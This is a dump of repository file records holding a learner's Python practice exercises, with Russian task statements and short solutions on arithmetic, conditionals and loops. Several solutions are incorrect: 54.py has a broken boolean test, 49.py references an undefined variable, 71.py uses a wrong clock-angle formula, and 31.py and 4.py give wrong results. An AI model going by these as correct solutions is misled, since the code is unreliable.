"num_lines": 11,
"path": "/Practic/Tasks/54.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано три числа. Если ровно два из них меньше 5, то вывести yes, иначе вывести no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x and y < 5 or x and z < 5 or y and z < 5:\n print(\"Yes\")\n\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.6204819083213806,
"alphanum_fraction": 0.6325300931930542,
"avg_line_length": 22.714284896850586,
"blob_id": "8698ea13c2b67406049263e1d84ebbc5cd196f61",
"content_id": "bcc564c658ab41036f4eef8bfc1e523977197f03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 7,
"path": "/Practic/Tasks/76.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран n раз фразу \"Silence is golden\". Число n вводит пользователь\n\nn = int(input('n:'))\ni = 0\nwhile i < n:\n i = i + 1\n print(\"Silence is golden\")\n"
},
{
"alpha_fraction": 0.5428571701049805,
"alphanum_fraction": 0.6228571534156799,
"avg_line_length": 20.875,
"blob_id": "d4641aa0334219c45c1a05baecb9dc76c27e670f",
"content_id": "759bd8cf9b41776e40065b5ef340a0ee29b09040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 8,
"path": "/Practic/Tasks/40.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно от -10 до 10 не включительно, то увеличить его на 5, иначе уменьшить на 10.\n\nx = int(input(\"x:\"))\n\nif -10 < x < 10:\n print(x+5)\nelse:\n print(x-10)\n"
},
{
"alpha_fraction": 0.6401515007019043,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 25.399999618530273,
"blob_id": "8a6c93ee36dbf4b97e28d1d35a9d2f261a0b1864",
"content_id": "f67ef0b3331f073ed9ae208daac69ca6b8f45614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 390,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 10,
"path": "/Practic/Tasks/71.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны числа h и m, где h - количество часов, m - количество минут некоторого момента времени. Найдите угол между часовой и минутной стрелками в этот момент времени.\n\nh = int(input(\"h:\"))\nm = int(input(\"m:\"))\n\nm_h = m / 60 + h\n\ngrad = (180 / 12) * m_h\n\nprint(grad)\n"
},
{
"alpha_fraction": 0.6256281137466431,
"alphanum_fraction": 0.7110552787780762,
"avg_line_length": 27.428571701049805,
"blob_id": "7c65579440b469d2aff7c2f333e30d582a2fcdc7",
"content_id": "1e43dcd57bcfe3c49cc0ba2c015ea2945cfd888e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 14,
"path": "/Practic/Tasks/63.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два трехзначных числа. Найдите шестизначное число, образованное из двух данных чисел путем дописывания второго числа к первому справа.\n\nvalue = int(input(\"Value:\"))\nvalue1 = int(input(\"Value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\ndigit1 = value1 // 100\ndigit2 = value1 // 10 % 10\ndigit3 = value1 % 10\n\nprint(digit_1,digit_2,digit_3,digit1,digit2,digit3)\n"
},
{
"alpha_fraction": 0.5246913433074951,
"alphanum_fraction": 0.5864197611808777,
"avg_line_length": 15.199999809265137,
"blob_id": "70d1a50b659432a5b9e2c880bdccdfd5876d76ad",
"content_id": "e20eda3369a0994181b3067c655b9eac1719bd99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 176,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/Practic/Tasks/94.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите сумму 1+1/2+1/3+…+1/n.\nfrom fractions import Fraction\nn = int(input(\"n:\"))\nsumm = 0\ni = 1\n\nwhile i <= n:\n summ += Fraction(1, i)\n i+=1\nprint(summ)\n"
},
{
"alpha_fraction": 0.7288135886192322,
"alphanum_fraction": 0.7966101765632629,
"avg_line_length": 58,
"blob_id": "3c8ff85df6936d04cbb141b29cb0199d5174feb1",
"content_id": "61cb55c62648d28a5fc6a0fa563fa50c03f15a68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/Practic/Tasks/96.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано натуральное число n. Вычислите 1cosx+1cosx2+…+1cosxn\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5679012537002563,
"avg_line_length": 19.25,
"blob_id": "c06c63cbc274e922ac9424eab241ae38f73319ae",
"content_id": "4b0cb983b1647bf7401712ff1854df52f2bab15c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 4,
"path": "/Practic/Tasks/9.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите |x|+x**5, если x=−2.\nimport math\nx = -2\nprint (math.fabs(x) + x ** 5)\n"
},
{
"alpha_fraction": 0.5253164768218994,
"alphanum_fraction": 0.5981012582778931,
"avg_line_length": 23.230770111083984,
"blob_id": "2a2de828563b65c0b99e37d5192d798e5bded92f",
"content_id": "cad8a4d419e4e1c9e460decdb74d456c3ad8df79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/Practic/Tasks/57.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дана дата из трех чисел (день, месяц и год).\n# Вывести yes, если такая дата существует\n# (например, 12 02 1999 - yes, 22 13 2001 - no).\n# Считать, что в феврале всегда 28 дней.\n\nd = int(input(\"d:\"))\nm = int(input(\"m:\"))\ny = int(input(\"y:\"))\n\nif d < 29 and m < 13 and y > 0:\n print(\"Yes\")\nelse:\n print(\"No\")\n\n"
},
{
"alpha_fraction": 0.4624277353286743,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 18.22222137451172,
"blob_id": "8dcf423227f5b55aee0e6405a65fdc12af2e021b",
"content_id": "2afe0e38277a975e358f538f603ef13ed067fab4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 9,
"path": "/Practic/Tasks/13.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения x2+b−−−−−√5−b2sin3(x+a)x при a=0.1, b=0.2 и x=1\n\nimport math\n\na = 0.1\nb = 0.2\nx = 1\n\nprint(math.pow(x**2 + b, 5) - (b**2*math.sin(x+a)**3) /x)\n"
},
{
"alpha_fraction": 0.2568093240261078,
"alphanum_fraction": 0.3501945436000824,
"avg_line_length": 14.9375,
"blob_id": "01ccbe4b8faf58ce7f3ecd1c3971c708e14138bd",
"content_id": "af46a267ffd1148f92035807673e2edef16a45b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 16,
"path": "/Practic/Tasks/97.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите 1⋅2+2⋅3⋅4+...+n⋅(n+1)⋅…⋅2n.\n# 2 + 24 + 72 = 98\ni = 0\nn = 4\nsum = 1\nbuf = 0\nwhile i < n:\n i += 1\n\n if i == 1:\n sum = i * (i + 1) * (i)\n buf += sum\n if i > 1:\n sum = i * (i + 1) * (i*2)\n buf += sum\nprint(buf)\n\n\n"
},
{
"alpha_fraction": 0.4895397424697876,
"alphanum_fraction": 0.5271966457366943,
"avg_line_length": 18.1200008392334,
"blob_id": "f9d555d43f3a064eec5fa7fb37132a68cc3e9c7d",
"content_id": "f8d20f1e2caaf786b0fd519f0b7b190cc33544ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 25,
"path": "/Practic/Tasks/49.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит четыре числа. Найдите наибольшее четное число среди них. Если оно не существует, выведите фразу \"not found\"\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nv = int(input(\"v:\"))\n\nmaxx = -10000\nif x % 2 == 0:\n if x > maxx:\n maxx = x\nif y % 2 == 0:\n if y > maxx:\n maxx = y\nif z % 2 == 0:\n if z > maxx:\n maxx = z\nif v % 2 == 0:\n if v > maxx:\n maxx = v\nif maxx == -10000:\n print(\"not found\")\n\n\nprint(b)\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.7060605883598328,
"avg_line_length": 19.625,
"blob_id": "c1c531da1b0062b6aa9d5a198ee12634f8eeaba0",
"content_id": "443a41c2bfa1c789cd633375316586303058bbfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 16,
"path": "/Practic/Tasks/111.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран:\n#AAAAAAAAAAAAAAAA\n#ABBBBBBBBBBBBBBA\n#ABBBBBBBBBBBBBBA\n#ABBBBBBBBBBBBBBA\n#AAAAAAAAAAAAAAAA\n#(количество строк вводит пользователь, ширина прямоугольника в два раза больше высоты)\n\na = int(input(\"a:\")) # высота\nb = a * 2 # ширина\nn = 0\n\nfor i in range(b):\n print(\"A\", end=\"\")\nfor j in range(a):\n print(\"A\")\n"
},
{
"alpha_fraction": 0.7455621361732483,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 55.33333206176758,
"blob_id": "4ab63a0008b6b70afe3599b3552111b2f827a35f",
"content_id": "a4c7f5d95c1e7ae256ca809e92f30ec027600e0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 3,
"path": "/Practic/Tasks/4.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран прямоугольник, заполненный буквами А. Количество строк в прямоугольнике равно 5, количество столбцов равно 8.\nfor i in range(1,9):\n print(\"AAAAAA\")\n"
},
{
"alpha_fraction": 0.6320610642433167,
"alphanum_fraction": 0.6671755909919739,
"avg_line_length": 26.29166603088379,
"blob_id": "d5591ef0eb887e88c61feba3082ef4641e0c650e",
"content_id": "8ac2cb960476bbdb2e419e2e4a887b35ce5cb8e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 972,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 24,
"path": "/Practic/Tasks/98.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Начав тренировки, лыжник в первый день пробежал 10 км.\n# Каждый следующий день он увеличивал пробег на 10% от пробега\n# предыдущего дня. Определите: а) пробег лыжника за второй,\n# третий, ..., десятый день тренировок;\n# б) какой суммарный путь он пробежал за первые 7 дней\n# тренировок. в) суммарный путь за n дней тренировок;\n# г) в какой день ему следует прекратить увеличивать пробег,\n# если он не должен превышать 80 км?\n\nday = int(input(\"day:\")) - 1\n\nfirst_day = 10\nnext_day = 0\ni = 0\nsum = 0\nrez = 10\n\nwhile i < day:\n i+=1\n rez = rez * 0.1 + rez\n sum += rez\nprint(\"rez:\",\"%.1f\" % rez,\"sum:\",sum +10)\nif sum > 80:\n print(day, \"stop\")\n"
},
{
"alpha_fraction": 0.551948070526123,
"alphanum_fraction": 0.6168830990791321,
"avg_line_length": 16.11111068725586,
"blob_id": "94315ecfd4c6ac16b8ca36535f41b253ac3e354f",
"content_id": "825d020042333fd3322ac0217da02446b7d852f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 9,
"path": "/Practic/Tasks/34.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно больше 3, то увеличить число на 10,\n# иначе уменьшить на 10.\n\nx = int(input(\"x:\"))\n\nif x > 3:\n print(x+10)\nelse:\n print(x-10)\n"
},
{
"alpha_fraction": 0.8101266026496887,
"alphanum_fraction": 0.8101266026496887,
"avg_line_length": 78,
"blob_id": "23fbfbffd6c4bb304c903b7b862e21c18afdec6e",
"content_id": "9eb99926d396a05077337eb9405a50a8e1c59ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 2,
"path": "/Practic/Tasks/2.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран текущее название дня недели, название месяца и свое имя. Каждое слово должно быть в отдельной строке\nprint(\"Wednesday\\nFebruary\\nYevgen\\n\")\n"
},
{
"alpha_fraction": 0.4803149700164795,
"alphanum_fraction": 0.5196850299835205,
"avg_line_length": 23.190475463867188,
"blob_id": "d7b35a561ceaf8e09829c8c0bc2aae4c3300516c",
"content_id": "714ed0a3bbca8cb6e1397394d8edde93ebf0c271",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 21,
"path": "/Practic/Tasks/68.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны коэффициенты a,b,c уравнения ax2+bx+c=0. Найти решение. Проверить ответы можно здесь. Как решать квадратные уравнения можно прочитать здесь.\n\nimport math\n\na = float(input(\"a:\"))\nb = float(input(\"b:\"))\nc = float(input(\"c:\"))\n\nd = b ** 2 - 4 * a * c\n\nprint(\"d:\", \"d = %.2f\" % d)\n\nif d == 0:\n x = -b / (2 * a)\n print(\"x = %.2f\" % x)\nif d < 0:\n print(\"not sqrt\")\nif d > 0:\n x1 = (-b + math.sqrt(d)) / (2 * a)\n x2 = (-b - math.sqrt(d)) / (2 * a)\n print(\"x1 = %.2f \\nx2 = %.2f\" % (x1, x2))\n"
},
{
"alpha_fraction": 0.6820809245109558,
"alphanum_fraction": 0.7052023410797119,
"avg_line_length": 27.66666603088379,
"blob_id": "8d78a7e828b149471c277c65240753012c727da5",
"content_id": "2f48da24179aa356d208fff3a6a82f84929fef53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 6,
"path": "/Practic/Tasks/77.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран прямоугольник из нулей. Количество строк вводит пользователь, количество столбцов равно 5.\n\nb = int(input(\"b:\"))\n\nfor i in range(0,5):\n print(\"0\"* b)\n\n"
},
{
"alpha_fraction": 0.5476190447807312,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 24.200000762939453,
"blob_id": "d307d0d7a294f784b61bd3c8b87054df4201385a",
"content_id": "6262078bfc08e8f5af7f1422ecde9d319863520f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 15,
"path": "/Practic/Tasks/61.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Определите, есть ли одинаковые цифры в нем.\n\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nif digit_1 == digit_2 or digit_1 == digit_3 or digit_1 == digit_4 or digit_2 == digit_3 or digit_2 == digit_4 or digit_3 == digit_4:\n print(\"Yes\")\nelse:\n print(\"no\")\n"
},
{
"alpha_fraction": 0.2849462330341339,
"alphanum_fraction": 0.4139784872531891,
"avg_line_length": 12.214285850524902,
"blob_id": "74a7560137f42d753d6f3888c53124b08cb7e943",
"content_id": "e101a560d8e59d470e21f1ad0b283311040371be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 14,
"path": "/Practic/Tasks/95.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны a и n. Вычислите p=(a+1)**2*(a+2)**2⋅…⋅(a+n)**2\n\n\n#9 * 16 * 25 * 36 = 129600\n\na = 2\nn = 4\ni = 0\nres = 1\nwhile i < n:\n i += 1\n p = (a + i) ** 2\n res = res * p\nprint(res )\n\n"
},
{
"alpha_fraction": 0.3097345232963562,
"alphanum_fraction": 0.3097345232963562,
"avg_line_length": 15.142857551574707,
"blob_id": "f8cdd43f1eab550dca9db337eff6936bf53feb86",
"content_id": "56bb0954664156b5ae8f1a4a91dc82571b3a22ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 7,
"path": "/Practic/Tasks/5.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран букву \"W\" из символов \"*\"\nprint('''\n * * *\n * * * *\n * * * *\n * *\n''')\n"
},
{
"alpha_fraction": 0.3320463299751282,
"alphanum_fraction": 0.5019304752349854,
"avg_line_length": 27.77777862548828,
"blob_id": "5b24558012ec3dbd0bc5a31d04a8177fc095a509",
"content_id": "3674b0bb7fe9586a0cc428a5c599a5dcd3f37664",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 9,
"path": "/Practic/Tasks/102.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что среди цифр есть цифра 3.\n\nfor i in range(1000, 9999):\n d_1 = i // 1000\n d_2 = i // 100 % 10\n d_3 = i // 10 % 10\n d_4 = i % 10\n if d_1 == 3 or d_2 == 3 or d_3 == 3 or d_4 == 3:\n print(i)\n"
},
{
"alpha_fraction": 0.6906474828720093,
"alphanum_fraction": 0.6906474828720093,
"avg_line_length": 26.799999237060547,
"blob_id": "1395bbca6d22e629ef0255f1936d15ca5f9e060f",
"content_id": "1d629f42ff1508c353b54c0a56e094900f87749e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 5,
"path": "/Practic/Tasks/14.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит два числа. Найдите сумму и произведение данных чисел.\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nprint(a+b)\nprint(a*b)\n"
},
{
"alpha_fraction": 0.5072886347770691,
"alphanum_fraction": 0.5510203838348389,
"avg_line_length": 23.5,
"blob_id": "ec98b6ac6d1ee8f7a4d738922d16937dd4b7aff4",
"content_id": "9b0a72909f281f215789f8c6ef07ffd565b288da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 14,
"path": "/Practic/Tasks/43.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит номер месяца. Вывести название поры года (весна, лето и т.д.)\n\nx = int(input(\"x:\"))\n\nif x == 12 or x == 1 or x ==2:\n print(\"winter\")\nelif x == 3 or x == 4 or x == 5:\n print(\"spring\")\nelif x == 6 or x == 7 or x == 8:\n print(\"summer\")\nelif x == 9 or x == 10 or x == 11:\n print(\"autumn\")\nelse:\n print(\"error\")\n"
},
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.6078431606292725,
"avg_line_length": 16,
"blob_id": "68ab9baa102d684f260ec33da5097f8c6bc3300e",
"content_id": "99ef37989c20bb1314292b3ffed32289a9b38d30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/Practic/Tasks/93.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите сумму квадратов первых n натуральных чисел\ni = 0\nsqrtt = 0\nn = int(input(\"n:\"))\nwhile i < n:\n i+=1\n sqrtt += i * i\nprint(sqrtt)\n#1+4+9=14\n"
},
{
"alpha_fraction": 0.5496453642845154,
"alphanum_fraction": 0.5957446694374084,
"avg_line_length": 27.200000762939453,
"blob_id": "612824c11a31110e988128c4b2b2d35ca14f638c",
"content_id": "514aeca1b87dc28d18b9e15c9701b0ac96ffc581",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 10,
"path": "/Practic/Tasks/45.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Если все числа больше 10 и первые два числа делятся на 3, то вывести yes, иначе no\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nif x > 10 and y > 10 and z > 10 and x % 3 == 0 and y % 3 == 0:\n print(\"yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.7835820913314819,
"avg_line_length": 65.5,
"blob_id": "0cb46a43fa103d61f3bc23e1d85370b96e959936",
"content_id": "2795b3203f8c97752e1e64fbcd0915afd3d6dda0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 2,
"path": "/Practic/Tasks/3.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран пять строк из нулей, причем количество нулей в каждой строке равно номеру строки.\nprint(\"0\\n00\\n000\\n0000\\n00000\")\n\n"
},
{
"alpha_fraction": 0.5555555820465088,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 39.5,
"blob_id": "7c3dd60ca7500ba14efbccf585dc42fd70ff457d",
"content_id": "c74619a1bc7542da595f02aeec38e82adfe20601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/Practic/Tasks/12.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения ex−2+|sin(x)|−x10⋅cos1x при x=3.6\nimport math\nx = 3.6\nprint( (math.exp(x-2)) + (math.fabs(math.sin(x))) - (x**10 * math.cos(1/x)) )\n"
},
{
"alpha_fraction": 0.3956834673881531,
"alphanum_fraction": 0.528777003288269,
"avg_line_length": 20.384614944458008,
"blob_id": "6372e075afccc13e18d2fe929790c56104b6d3ea",
"content_id": "a4c7e1b14bf77f9b37528f18a1a31f552cd64d29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 337,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 13,
"path": "/Practic/Tasks/83.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите следующие строки. Первая: 25 25.5 24.8. Вторая: 26 26.5 25.8. И так далее. Последняя строка: 35 35.5 34.8.\n\n\ni = 10\nnum = 25.0\nwhile i >= 0:\n print('%d'%num, end=\" \")\n num += 0.5\n print(num, end=\" \")\n num -= 0.7\n print(num)\n num += 1.2\n i -= 1\n"
},
{
"alpha_fraction": 0.5632184147834778,
"alphanum_fraction": 0.6272578239440918,
"avg_line_length": 24.20833396911621,
"blob_id": "f586d94243489250cce314dc6c8562bebc330788",
"content_id": "b4420e16df4d8dbbb8b14dbbece3b9cde0b3010d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/Practic/Tasks/56.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Робот может перемещаться в четырех направлениях\n#(«11» — север, «12» — запад, «13» — юг, «14» — восток)\n# и принимать три цифровые команды: 0 — продолжать\n# движение, 1 — поворот налево, –1 — поворот направо.\n# Дан число (11, 12, 13 или 14) — исходное направление\n# робота и целое число N (0, 1 или -1) — посланная ему\n# команда. Вывести направление робота после выполнения\n# полученной команды (то есть север, запад, юг или восток).\n\nn = 11\nw = 12\ne = 13\ns = 14\n\nN = int(input(\"Input 0, 1 or -1 ,n=\"))\n\nif N == 0:\n print(n+1,w,e,s)\n\nif N == 1:\n print(n,w,e+1,s)\n\nif N == -1:\n print(n,w,e,s+1)\n\n\n\n\n"
},
{
"alpha_fraction": 0.5546875,
"alphanum_fraction": 0.6484375,
"avg_line_length": 24.600000381469727,
"blob_id": "2797777530b4f7be3a3e38e08f9add8ac25f3016",
"content_id": "160ef97f2877c936f286ce3c30033a58c07c46d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 5,
"path": "/Practic/Tasks/81.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа 100, 96, 92, ... до последнего положительного включительно.\ni= 104\nwhile i > 0:\n i -= 4\n print(i)\n"
},
{
"alpha_fraction": 0.5785714387893677,
"alphanum_fraction": 0.6928571462631226,
"avg_line_length": 16.5,
"blob_id": "088af8f9cdf288073cf36abfe95b1a42b5580906",
"content_id": "c435d215db9a022a4ebb6c453dcc43cc3b8dcaba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/Practic/Tasks/31.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дан прямоугольник размером 647 x 170.\n# Сколько квадратов со стороной 30 можно вырезать из него?\na = 647\nb = 170\n\nc = 30\n\nprint ((a+b)//c)\n"
},
{
"alpha_fraction": 0.6301369667053223,
"alphanum_fraction": 0.682191789150238,
"avg_line_length": 32.181819915771484,
"blob_id": "e6246b8b16f8a70252bca6b68b8a5022a3dee688",
"content_id": "f1b4d6fb1699687c858e5a0f4a5b1174f361e9b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 11,
"path": "/Practic/Tasks/19.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит цены 1 кг конфет и 1 кг печенья.\n# Найдите стоимость: а) одной покупки из 300 г конфет и 400 г печенья;\n# б) трех покупок, каждая из 2 кг печенья и 1 кг 800 г конфет.\n\nsandy = int(input(\"sandy:\"))\ncookies = int(input(\"cookies:\"))\n\nfirst_buy = sandy * 0.3 + cookies * 0.4\nsecond_buy = (2 * sandy + cookies) * 3\n\nprint(first_buy,'\\t',second_buy)\n"
},
{
"alpha_fraction": 0.6277372241020203,
"alphanum_fraction": 0.6423357725143433,
"avg_line_length": 26.200000762939453,
"blob_id": "d2b833cf8d9f6e4ddfffe804d0e639f3effa52b0",
"content_id": "9255fbff1d890ac17795a82f3b3dca9fd44f5b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 5,
"path": "/Practic/Tasks/15.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит число. Выведите на экран квадрат этого числа, куб этого числа.\n\na = int(input(\"a=\"))\n\nprint( \" \", a**2,'\\n ',a**3)\n\n"
},
{
"alpha_fraction": 0.37142857909202576,
"alphanum_fraction": 0.6095238327980042,
"avg_line_length": 25.25,
"blob_id": "f7e872415c77806f40c7fe2bec4e43957df62e5f",
"content_id": "979a1b6c4ae3d81365ad491ef2728584e9b0a749",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 4,
"path": "/Practic/Tasks/80.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран ряд чисел 1001, 1004, 1007, ... 1025.\n\nfor i in range (1001, 1025, 3):\n print(i)\n"
},
{
"alpha_fraction": 0.5864979028701782,
"alphanum_fraction": 0.6033755540847778,
"avg_line_length": 20.545454025268555,
"blob_id": "f3cd5f4ed85d7aa6878842abe3d9471bf7acf943",
"content_id": "a26c3429a588322e24fe3a4be37b1aef895e6489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 11,
"path": "/Practic/Tasks/21.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
